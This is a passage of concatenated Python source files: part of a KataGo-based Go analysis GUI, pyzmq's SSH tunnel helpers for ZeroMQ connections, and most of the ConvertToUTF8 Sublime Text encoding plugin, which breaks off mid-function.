def _do_undo(self):
if (
self.ai_lock.active
and self.auto_undo.active(self.board.current_move.player)
and len(self.board.current_move.parent.children) > self.num_undos(self.board.current_move)
and not self.train_settings.get("dont_lock_undos")
):
self.info.text = f"Can't undo this move more than {self.num_undos(self.board.current_move)} time(s) when locked"
return
self.board.undo()
self.update_evaluation()
def _do_redo(self):
self.board.redo()
self.update_evaluation()
def _do_redo_branch(self, direction):
self.board.switch_branch(direction)
self.update_evaluation()
def _do_init(self, board_size, komi=None):
self.board_size = board_size
self.komi = float(komi or Config.get("board").get(f"komi_{board_size}", 6.5))
self.board = Board(board_size)
self._request_analysis(self.board.root)
self.redraw(include_board=True)
self.ready = True
if self.ai_lock.active:
self.ai_lock.checkbox._do_press()
for el in [self.ai_lock.checkbox, self.hints.black, self.hints.white, self.ai_auto.black, self.ai_auto.white, self.auto_undo.black, self.auto_undo.white, self.ai_move]:
el.disabled = False
def universal_read(self, file):
with open(file, "rb") as f:
bin_c = f.read()
for encoding in ["utf-8", "iso-8859-1", "cp949", "GB18030"]:
try:
return bin_c.decode(encoding=encoding)
except:
pass
self.show_error(f"could not decode file contents of {file}")
return ""
def _do_analyze_sgf(self, sgf, faster=False, rewind=False):
sgfprops = {k: v.strip("[]").split("][") if k in ["AB", "AW"] else v.strip("[]") for k, v in re.findall(r"\b(\w+)((?:\[.*?\])+)", sgf)}
size = int(sgfprops.get("SZ", self.board_size))
sgfmoves = re.findall(r"\b([BW])\[([a-z]{2})\]", sgf)
if not sgfmoves and not sgfprops:
fileselect_popup = Popup(title="Double Click SGF file to analyze", size_hint=(0.8, 0.8))
fc = FileChooserListView(multiselect=False, path=os.path.expanduser("~"), filters=["*.sgf"])
blui = BoxLayout(orientation="horizontal", size_hint=(1, 0.1))
cbfast = CheckBox(color=(0.95, 0.95, 0.95, 1))
cbrewind = CheckBox(color=(0.95, 0.95, 0.95, 1))
for widget in [Label(text="Analyze Extra Fast"), cbfast, Label(text="Rewind to start"), cbrewind]:
blui.add_widget(widget)
bl = BoxLayout(orientation="vertical")
bl.add_widget(fc)
bl.add_widget(blui)
fileselect_popup.add_widget(bl)
def readfile(files, _mouse):
fileselect_popup.dismiss()
self.action("analyze-sgf", self.universal_read((files[0])), cbfast.active, cbrewind.active)
fc.on_submit = readfile
fileselect_popup.open()
return
self._do_init(size, sgfprops.get("KM"))
handicap = int(sgfprops.get("HA", 0))
if handicap and not "AB" in sgfprops:
self.board.place_handicap_stones(handicap)
placements = [Move(player=pl, sgfcoords=(mv, self.board_size)) for pl, player in enumerate(Move.PLAYERS) for mv in sgfprops.get("A" + player, [])]
for placement in placements: # free handicaps
self.board.play(placement) # bypass analysis
if handicap or placements:
self._request_analysis(self.board.current_move) # ensure next move analysis works
moves = [Move(player=Move.PLAYERS.index(p.upper()), sgfcoords=(mv, self.board_size)) for p, mv in sgfmoves]
for move in moves:
self.play(move, faster=faster and move != moves[-1])
if rewind:
self.board.rewind()
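# Hedged worked example of the SGF parsing above (illustrative input, not from any real game):
# for sgf = "(;GM[1]SZ[19]KM[6.5]AB[dd][pp];B[pd];W[dp])" the property regex yields
#   [('GM', '[1]'), ('SZ', '[19]'), ('KM', '[6.5]'), ('AB', '[dd][pp]'), ('B', '[pd]'), ('W', '[dp]')]
# so sgfprops becomes {'GM': '1', 'SZ': '19', 'KM': '6.5', 'AB': ['dd', 'pp'], ...},
# while the move regex yields sgfmoves = [('B', 'pd'), ('W', 'dp')].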
# analysis thread
def _analysis_read_thread(self):
while True:
while self.outstanding_analysis_queries:
self._send_analysis_query(self.outstanding_analysis_queries.pop(0))
line = self.kata.stdout.readline()
if not line:  # empty read means the engine closed its stdout (process exited)
return
try:
analysis = json.loads(line)
except json.JSONDecodeError as e:
print(f"JSON decode error: '{e}' encountered after receiving input '{line}'")
return
if self.debug:
print(f"[{time.time()-self.query_time.get(analysis['id'],0):.1f}] kata analysis received:", line[:80], "...")
if "error" in analysis:
print(analysis)
self.show_error(f"ERROR IN KATA ANALYSIS: {analysis['error']}")
else:
self.board.store_analysis(analysis)
self.update_evaluation()
def _send_analysis_query(self, query):
self.query_time[query["id"]] = time.time()
if self.kata:
self.kata.stdin.write((json.dumps(query) + "\n").encode())
self.kata.stdin.flush()
else:  # engine process not started yet (e.g. root analysis at startup); queue the query until KataGo is up
self.outstanding_analysis_queries.append(copy.copy(query))
def _request_analysis(self, move, faster=False):
faster_fac = 5 if faster else 1
move_id = move.id
moves = self.board.moves
fast = self.ai_fast.active
query = {
"id": str(move_id),
"moves": [[m.bw_player(), m.gtp()] for m in moves],
"rules": "japanese",
"komi": self.komi,
"boardXSize": self.board_size,
"boardYSize": self.board_size,
"analyzeTurns": [len(moves)],
"includeOwnership": True,
"maxVisits": self.visits[fast][1] // faster_fac,
}
if self.debug:
print(f"sending query for move {move_id}: {str(query)[:80]}")
self._send_analysis_query(query)
query.update({"id": f"PASS_{move_id}", "maxVisits": self.visits[fast][0] // faster_fac, "includeOwnership": False})
query["moves"] += [[move.bw_player(next_move=True), "pass"]]
query["analyzeTurns"][0] += 1
self._send_analysis_query(query)
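# Hedged illustration of the two queries sent above (coordinates and visit counts are made up):
# main query, written to KataGo's analysis engine stdin as one JSON object per line:
#   {"id": "12", "moves": [["B", "Q16"], ["W", "D4"]], "rules": "japanese", "komi": 6.5,
#    "boardXSize": 19, "boardYSize": 19, "analyzeTurns": [2], "includeOwnership": true, "maxVisits": 500}
# follow-up pass query: same position with a pass by the side to move appended, used to evaluate passing:
#   {"id": "PASS_12", "moves": [["B", "Q16"], ["W", "D4"], ["B", "pass"]], ...,
#    "analyzeTurns": [3], "includeOwnership": false, "maxVisits": 25}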
def output_sgf(self):
return self.board.write_sgf(self.komi, self.train_settings)
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
"""
# Copyright (C) 2010-2011 IPython Development Team
# Copyright (C) 2011- PyZMQ Developers
#
# Redistributed from IPython under the terms of the BSD License.
import atexit
import os
import re
import signal
import socket
import sys
import warnings
from getpass import getpass
from getpass import getuser
from multiprocessing import Process
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
import paramiko
SSHException = paramiko.ssh_exception.SSHException
except ImportError:
paramiko = None # type:ignore[assignment]
class SSHException(Exception): # type: ignore
pass
else:
from .forward import forward_tunnel
try:
import pexpect # type: ignore
except ImportError:
pexpect = None
def select_random_ports(n):
"""Select and return n random ports that are available."""
ports = []
sockets = []
for _ in range(n):
sock = socket.socket()
sock.bind(("", 0))
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
# -----------------------------------------------------------------------------
# Check for passwordless login
# -----------------------------------------------------------------------------
_password_pat = re.compile((r"pass(word|phrase):".encode("utf8")), re.IGNORECASE)
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == "win32"
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = "ssh -f " + server
if keyfile:
cmd += " -i " + keyfile
cmd += " exit"
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop("SSH_ASKPASS", None)
ssh_newkey = "Are you sure you want to continue connecting"
p = pexpect.spawn(cmd, env=env)
while True:
try:
i = p.expect([ssh_newkey, _password_pat], timeout=0.1)
if i == 0:
raise SSHException("The authenticity of the host can't be established.")
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavailable, "
if sys.platform == "win32":
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile, look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(
addr,
server,
keyfile=keyfile,
password=password,
paramiko=paramiko,
timeout=timeout,
)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel) : (str, object)
The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split("://")
ip, rport = addr.split(":")
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == "win32"
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(
lport,
rport,
server,
remoteip=ip,
keyfile=keyfile,
password=password,
timeout=timeout,
)
return "tcp://127.0.0.1:%i" % lport, tunnel
def openssh_tunnel(
lport, rport, server, remoteip="127.0.0.1", keyfile=None, password=None, timeout=60
):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh = "ssh "
if keyfile:
ssh += "-i " + keyfile
if ":" in server:
server, port = server.split(":")
ssh += " -p %s" % port
cmd = "%s -O check %s" % (ssh, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
pid = int(output[output.find(b"(pid=") + 5 : output.find(b")")]) # noqa
cmd = "%s -O forward -L 127.0.0.1:%i:%s:%i %s" % (
ssh,
lport,
remoteip,
rport,
server,
)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
atexit.register(_stop_tunnel, cmd.replace("-O forward", "-O cancel", 1))
return pid
cmd = "%s -f -S none -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh,
lport,
remoteip,
rport,
server,
timeout,
)
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop("SSH_ASKPASS", None)
ssh_newkey = "Are you sure you want to continue connecting"
tunnel = pexpect.spawn(cmd, env=env)
failed = False
while True:
try:
i = tunnel.expect([ssh_newkey, _password_pat], timeout=0.1)
if i == 0:
raise SSHException("The authenticity of the host can't be established.")
except pexpect.TIMEOUT:
continue
except pexpect.EOF as e:
if tunnel.exitstatus:
print(tunnel.exitstatus)
print(tunnel.before)
print(tunnel.after)
raise RuntimeError("tunnel '%s' failed to start" % (cmd)) from e
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password = None
if password is None:
password = getpass("%s's password: " % (server))
tunnel.sendline(password)
failed = True
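# Hedged example of what this builds (all values illustrative): a call like
#   openssh_tunnel(12345, 5555, "user@gateway.example.com", timeout=60)
# first tries to reuse an existing ssh ControlMaster via "ssh -O check" / "ssh -O forward";
# otherwise it spawns roughly
#   ssh -f -S none -L 127.0.0.1:12345:127.0.0.1:5555 user@gateway.example.com sleep 60
# and answers the password prompt through pexpect if key-based login is unavailable.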
def _stop_tunnel(cmd):
pexpect.run(cmd)
def _split_server(server):
if "@" in server:
username, server = server.split("@", 1)
else:
username = getuser()
if ":" in server:
server, port = server.split(":")
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(
lport, rport, server, remoteip="127.0.0.1", keyfile=None, password=None, timeout=60
):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: " % (server))
p = Process(
target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password),
)
p.daemon = True
p.start()
return p
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(
server,
port,
username=username,
key_filename=keyfile,
look_for_keys=True,
password=password,
)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print("*** Failed to connect to %s:%d: %r" % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print("SIGINT: Port forwarding stopped cleanly")
sys.exit(0)
except Exception as e:
print("Port forwarding stopped uncleanly: %s" % e)
sys.exit(255)
if sys.platform == "win32":
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = [
"tunnel_connection",
"ssh_tunnel",
"openssh_tunnel",
"paramiko_tunnel",
"try_passwordless_ssh",
]
|
ConvertToUTF8.py
|
# -*- coding: utf-8 -*-
import sublime, sublime_plugin
import sys
import os
if sys.version_info < (3, 0):
from chardet.universaldetector import UniversalDetector
NONE_COMMAND = (None, None, 0)
ST3 = False
else:
from .chardet.universaldetector import UniversalDetector
NONE_COMMAND = ('', None, 0)
ST3 = True
import codecs
import threading
import json
import time
import hashlib
import shutil
SKIP_ENCODINGS = ('ASCII', 'UTF-8', 'UTF-16LE', 'UTF-16BE')
SUPERSETS = {
'GB2312': 'GBK',
'GBK': 'GB18030',
'BIG5': 'CP950', # CP950 is common in Taiwan
'CP950': 'BIG5-HKSCS', # HK official Big5 variant
'EUC-KR': 'CP949' # CP949 is a superset of euc-kr!
}
SETTINGS = {}
REVERTING_FILES = []
CONFIRM_IS_AVAILABLE = ('ok_cancel_dialog' in dir(sublime))
ENCODINGS_NAME = []
ENCODINGS_CODE = []
class EncodingCache(object):
def __init__(self):
self.file = os.path.join(sublime.packages_path(), 'User', 'encoding_cache.json')
self.cache = []
self.max_size = -1
self.dirty = False
self.load()
def save_on_dirty(self):
if self.dirty:
return
self.dirty = True
sublime.set_timeout(self.save, 10000)
def shrink(self):
if self.max_size < 0:
return
if len(self.cache) > self.max_size:
self.save_on_dirty()
del self.cache[self.max_size:]
def set_max_size(self, max_size):
self.max_size = max_size
self.shrink()
def load(self):
if not os.path.exists(self.file):
return
fp = open(self.file, 'r')
try:
self.cache = json.load(fp)
except ValueError:
# the cache file is corrupted
return
finally:
fp.close()
if len(self.cache) > 0:
if 'file' in self.cache[0]:
# old style cache
new_cache = []
for item in self.cache:
new_cache.append({
item['file']: item['encoding']
})
self.cache = new_cache
self.save_on_dirty()
def save(self):
self.shrink()
fp = open(self.file, 'w')
json.dump(self.cache, fp)
fp.close()
self.dirty = False
def get(self, file_name):
for item in self.cache:
if file_name in item:
return item.get(file_name)
return None
def pop(self, file_name):
for item in self.cache:
if file_name in item:
self.cache.remove(item)
self.save_on_dirty()
return item.get(file_name)
return None
def set(self, file_name, encoding):
if self.max_size < 1:
return
self.pop(file_name)
self.cache.insert(0, {
file_name: encoding
})
self.save_on_dirty()
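# Hedged note on the on-disk format written by save() (paths below are illustrative):
# encoding_cache.json holds a JSON list of single-entry objects, most recently used first,
# e.g. [{"/home/user/a.txt": "GBK"}, {"/home/user/b.csv": "EUC-KR"}];
# load() also migrates the older [{"file": ..., "encoding": ...}] layout into this form.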
encoding_cache = None
OPT_MAP = {
'convert_and_open': True,
'no_action': False,
'always': True,
'never': False,
True: True,
False: False
}
def get_settings():
global ENCODINGS_NAME, ENCODINGS_CODE
settings = sublime.load_settings('ConvertToUTF8.sublime-settings')
encoding_list = settings.get('encoding_list', [])
ENCODINGS_NAME = [pair[0] for pair in encoding_list]
ENCODINGS_CODE = [pair[1] for pair in encoding_list]
encoding_cache.set_max_size(settings.get('max_cache_size', 100))
SETTINGS['max_detect_lines'] = settings.get('max_detect_lines', 600)
SETTINGS['preview_action'] = OPT_MAP.get(settings.get('preview_action', False))
SETTINGS['default_encoding_on_create'] = settings.get('default_encoding_on_create', '')
SETTINGS['convert_on_load'] = OPT_MAP.get(settings.get('convert_on_load', True))
SETTINGS['convert_on_save'] = OPT_MAP.get(settings.get('convert_on_save', True))
SETTINGS['lazy_reload'] = settings.get('lazy_reload', True)
SETTINGS['convert_on_find'] = settings.get('convert_on_find', False)
SETTINGS['confidence'] = settings.get('confidence', 0.95)
def get_setting(view, key):
# read project specific settings first
return view.settings().get(key, SETTINGS[key])
TMP_DIR = None
def get_temp_name(name):
if not name:
return None
name = name.encode('UTF-8')
return hashlib.md5(name).hexdigest()
def clean_temp_folder():
tmp_files = os.listdir(TMP_DIR)
for win in sublime.windows():
for view in win.views():
file_name = view.file_name()
tmp_name = get_temp_name(file_name)
if tmp_name in tmp_files:
if not view.is_dirty():
tmp_file = os.path.join(TMP_DIR, tmp_name)
# check mtime
mtime1 = os.path.getmtime(file_name)
mtime2 = os.path.getmtime(tmp_file)
if mtime1 != mtime2:
# file was changed outside
view.settings().erase('prevent_detect')
continue
shutil.move(tmp_file, file_name)
tmp_files.remove(tmp_name)
for tmp_name in tmp_files:
tmp_file = os.path.join(TMP_DIR, tmp_name)
os.unlink(tmp_file)
def init_settings():
global encoding_cache, TMP_DIR
encoding_cache = EncodingCache()
get_settings()
sublime.load_settings('ConvertToUTF8.sublime-settings').add_on_change('get_settings', get_settings)
TMP_DIR = os.path.join(sublime.packages_path(), 'User', 'c2u_tmp')
if not os.path.exists(TMP_DIR):
os.mkdir(TMP_DIR)
def setup_views():
clean_temp_folder()
# check existing views
for win in sublime.windows():
for view in win.views():
if not get_setting(view, 'convert_on_load'):
break
view.settings().set('is_init_dirty_state', view.is_dirty())
if view.is_dirty() or view.settings().get('origin_encoding'):
show_encoding_status(view)
continue
file_name = view.file_name()
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def plugin_loaded():
init_settings()
setup_views()
def plugin_unloaded():
global encoding_cache
encoding_cache = None
sublime.load_settings('ConvertToUTF8.sublime-settings').clear_on_change('get_settings')
def wait_for_ready():
if sublime.windows():
setup_views()
else:
sublime.set_timeout(wait_for_ready, 100)
if not ST3:
init_settings()
wait_for_ready()
def detect(view, file_name, cnt):
if not file_name or not os.path.exists(file_name) or os.path.getsize(file_name) == 0:
return
encoding = encoding_cache.pop(file_name)
if encoding:
sublime.set_timeout(lambda: init_encoding_vars(view, encoding, detect_on_fail=True), 0)
return
sublime.set_timeout(lambda: view.set_status('origin_encoding', 'Detecting encoding, please wait...'), 0)
detector = UniversalDetector()
fp = open(file_name, 'rb')
for line in fp:
# cut MS-Windows CR code
line = line.replace(b'\r',b'')
detector.feed(line)
cnt -= 1
if detector.done or cnt == 0:
break
fp.close()
detector.close()
encoding = detector.result['encoding']
if encoding:
encoding = encoding.upper()
confidence = detector.result['confidence']
sublime.set_timeout(lambda: check_encoding(view, encoding, confidence), 0)
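# A minimal standalone sketch of the chardet flow used above (illustration only, never called):
# feed bytes incrementally and read back the guessed encoding with its confidence.
def _example_detect_bytes(data_bytes):
    det = UniversalDetector()
    for chunk in data_bytes.splitlines(True):
        det.feed(chunk)
        if det.done:
            break
    det.close()
    return det.result['encoding'], det.result['confidence']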
def check_encoding(view, encoding, confidence):
view_encoding = view.encoding()
result = 'Detected {0} vs {1} with {2:.0%} confidence'.format(encoding, view_encoding, confidence) if encoding else 'Encoding cannot be detected'
view.set_status('origin_encoding', result)
print(result)
not_detected = not encoding or confidence < SETTINGS['confidence'] or encoding == view_encoding
# ST can't detect the encoding
if view_encoding in ('Undefined', view.settings().get('fallback_encoding')):
if not_detected:
show_selection(view)
return
else:
if not_detected:
# using encoding detected by ST
encoding = view_encoding
else:
show_selection(view, [
['{0} ({1:.0%})'.format(encoding, confidence), encoding],
['{0}'.format(view_encoding), view_encoding]
])
return
init_encoding_vars(view, encoding)
def show_encoding_status(view):
encoding = view.settings().get('force_encoding')
if not encoding:
encoding = view.settings().get('origin_encoding')
if not encoding:
return
view.set_status('origin_encoding', encoding)
def init_encoding_vars(view, encoding, run_convert=True, stamp=None, detect_on_fail=False):
if not encoding:
return
view.settings().set('origin_encoding', encoding)
show_encoding_status(view)
if encoding in SKIP_ENCODINGS or encoding == view.encoding():
encoding_cache.set(view.file_name(), encoding)
return
view.settings().set('in_converting', True)
if run_convert:
if stamp is None:
stamp = '{0}'.format(time.time())
translate_tabs_to_spaces = view.settings().get('translate_tabs_to_spaces')
view.settings().set('translate_tabs_to_spaces', False)
view.run_command('convert_to_utf8', {'detect_on_fail': detect_on_fail, 'stamp': stamp})
view.settings().set('translate_tabs_to_spaces', translate_tabs_to_spaces)
def clean_encoding_vars(view):
view.settings().erase('in_converting')
view.settings().erase('origin_encoding')
view.erase_status('origin_encoding')
view.set_scratch(False)
encoding_cache.pop(view.file_name())
def remove_reverting(file_name):
while file_name in REVERTING_FILES:
REVERTING_FILES.remove(file_name)
class EncodingSelection(threading.Thread):
def __init__(self, view, names, codes):
threading.Thread.__init__(self)
self.view = view
self.names = names
self.codes = codes
def run(self):
sublime.set_timeout(self.show_panel, 0)
def show_panel(self):
window = self.view.window()
if window:
window.show_quick_panel(self.names, self.on_done)
def on_done(self, selected):
if selected == -1:
clean_encoding_vars(self.view)
else:
init_encoding_vars(self.view, self.codes[selected])
def show_selection(view, encoding_list = None):
if encoding_list:
names = [pair[0] for pair in encoding_list]
codes = [pair[1] for pair in encoding_list]
else:
names = ENCODINGS_NAME
codes = ENCODINGS_CODE
EncodingSelection(view, names, codes).start()
class ReloadWithEncoding(threading.Thread):
def __init__(self, view, encoding):
threading.Thread.__init__(self)
self.view = view
self.encoding = encoding
def run(self):
sublime.set_timeout(self.reload, 0)
def reload(self):
init_encoding_vars(self.view, self.encoding)
def reload_encoding(view, encoding):
ReloadWithEncoding(view, encoding).start()
stamps = {}
class ShowEncodingSelectionCommand(sublime_plugin.TextCommand):
def run(self, edit):
show_selection(self.view)
class ReloadWithEncodingCommand(sublime_plugin.TextCommand):
def run(self, edit, encoding):
reload_encoding(self.view, encoding)
class PyInstructionCommand(sublime_plugin.TextCommand):
def get_branch(self, platform, arch):
return [{
'linux-x64': 'master',
'linux-x32': 'x32',
}, {
'linux-x64': 'linux-x64',
'linux-x32': 'linux-x32',
'osx-x64': 'osx',
}][ST3].get(platform + '-' + arch)
def run(self, edit, encoding, file_name, need_codecs):
self.view.set_name('ConvertToUTF8 Instructions')
self.view.set_scratch(True)
self.view.settings().set("word_wrap", True)
msg = 'File: {0}\nEncoding: {1}\nError: '.format(file_name, encoding)
if need_codecs:
msg = msg + 'Codecs missing\n\n'
branch = self.get_branch(sublime.platform(), sublime.arch())
if branch:
ver = '33' if ST3 else '26'
msg = msg + 'Please install Codecs{0} plugin (https://github.com/seanliang/Codecs{0}/tree/{1}).\n'.format(ver, branch)
else:
import platform
msg = msg + 'Please send the following information to sunlxy (at) yahoo.com:\n====== Debug Information ======\nVersion: {0}-{1}\nPlatform: {2}\nPath: {3}\nEncoding: {4}\n'.format(
sublime.version(), sublime.arch(), platform.platform(), sys.path, encoding
)
else:
msg = msg + 'Unsupported encoding, see http://docs.python.org/library/codecs.html#standard-encodings\n\nPlease try other tools such as iconv.\n'
self.view.insert(edit, 0, msg)
self.view.set_read_only(True)
self.view.window().focus_view(self.view)
class ConvertToUtf8Command(sublime_plugin.TextCommand):
def run(self, edit, encoding=None, stamp=None, detect_on_fail=False):
view = self.view
if encoding:
view.settings().set('force_encoding', encoding)
origin_encoding = view.settings().get('origin_encoding')
# convert only when ST can't load file properly
run_convert = (view.encoding() == view.settings().get('fallback_encoding'))
if origin_encoding:
if origin_encoding == encoding:
return
view.set_scratch(False)
run_convert = False
init_encoding_vars(view, encoding, run_convert, stamp)
return
else:
encoding = view.settings().get('origin_encoding')
if not encoding:
return
file_name = view.file_name()
if not (file_name and os.path.exists(file_name)):
return
# try fast decode
fp = None
try:
fp = codecs.open(file_name, 'rb', encoding, errors='strict')
contents = fp.read()
except LookupError as e:
try:
# reload codecs
import _multibytecodec, imp, encodings
imp.reload(encodings)
imp.reload(codecs)
codecs.getencoder(encoding)
view.run_command('reload_with_encoding', {'encoding': encoding})
except (ImportError, LookupError) as e:
need_codecs = (type(e) == ImportError)
clean_encoding_vars(view)
view.window().new_file().run_command('py_instruction', {'encoding': encoding, 'file_name': file_name, 'need_codecs': need_codecs})
return
except UnicodeDecodeError as e:
if detect_on_fail:
detect(view, file_name, get_setting(view, 'max_detect_lines'))
return
superset = SUPERSETS.get(encoding)
if superset:
print('Try encoding {0} instead of {1}.'.format(superset, encoding))
init_encoding_vars(view, superset, True, stamp)
return
if CONFIRM_IS_AVAILABLE:
if sublime.ok_cancel_dialog(u'Errors occurred while converting {0} with {1} encoding.\n\n'
'WARNING: Continuing to load this file using {1}; malformed data will be ignored.'
'\n\nPress "Cancel" to choose another encoding manually.'.format
(os.path.basename(file_name), encoding)):
fp.close()
fp = codecs.open(file_name, 'rb', encoding, errors='ignore')
contents = fp.read()
else:
show_selection(view)
return
else:
view.set_status('origin_encoding', u'Errors occurred while converting {0} with {1} encoding'.format
(os.path.basename(file_name), encoding))
show_selection(view)
return
finally:
if fp:
fp.close()
encoding_cache.set(file_name, encoding)
contents = contents.replace('\r\n', '\n').replace('\r', '\n')
regions = sublime.Region(0, view.size())
sel = view.sel()
rs = [(view.rowcol(x.a), view.rowcol(x.b)) for x in sel]
vp = view.viewport_position()
view.set_viewport_position((0, 0), False)
view.replace(edit, regions, contents)
sel.clear()
for x in rs:
sel.add(self.find_region(x))
view.set_viewport_position(vp, False)
stamps[file_name] = stamp
sublime.status_message('{0} -> UTF8'.format(encoding))
def find_region(self, reg):
view = self.view
(x1, y1), (x2, y2) = reg
reverse = x1 > x2 or (x1 == x2 and y1 > y2)
# swap these two points for easy computing
if reverse:
(x1, y1), (x2, y2) = (x2, y2), (x1, y1)
_, end1 = view.rowcol(view.line(view.text_point(x1, 0)).b)
# exceed one line, narrow the selection
if y1 > end1:
# forward to end
y1 = end1
if x1 == x2:
if y2 > end1:
# backward to start
y2 = y1
else:
_, end2 = view.rowcol(view.line(view.text_point(x2, 0)).b)
if y2 > end2:
# backward to beginning
y2 = 0
pt0 = view.text_point(x1, y1)
pt1 = view.text_point(x2, y2)
# swap the points back
if reverse:
pt0, pt1 = pt1, pt0
return sublime.Region(pt0, pt1)
def description(self):
encoding = self.view.settings().get('origin_encoding')
if not encoding:
return
return '{0} -> UTF8'.format(encoding)
def is_enabled(self):
return self.view.encoding() != 'Hexadecimal'
class ConvertFromUtf8Command(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
encoding = view.settings().get('force_encoding')
if not encoding:
encoding = view.settings().get('origin_encoding')
file_name = view.file_name()
if not encoding or encoding == 'UTF-8':
encoding_cache.pop(file_name)
return
# remember current folded regions
regions = [[x.a, x.b] for x in view.folded_regions()]
if regions:
view.settings().set('folded_regions', regions)
vp = view.viewport_position()
view.settings().set('viewport_position', [vp[0], vp[1]])
fp = None
try:
fp = open(file_name, 'rb')
contents = codecs.EncodedFile(fp, encoding, 'UTF-8').read()
except (LookupError, UnicodeEncodeError) as e:
sublime.error_message(u'Cannot convert the file encoding of {0} to {1}; it was saved as UTF-8 instead:\n\n{2}'.format
(os.path.basename(file_name), encoding, e))
return
finally:
if fp:
fp.close()
# write content to temporary file
tmp_name = os.path.join(TMP_DIR, get_temp_name(file_name))
fp = open(tmp_name, 'wb')
fp.write(contents)
fp.close()
if not get_setting(view, 'lazy_reload'):
# os.rename has "Invalid cross-device link" issue
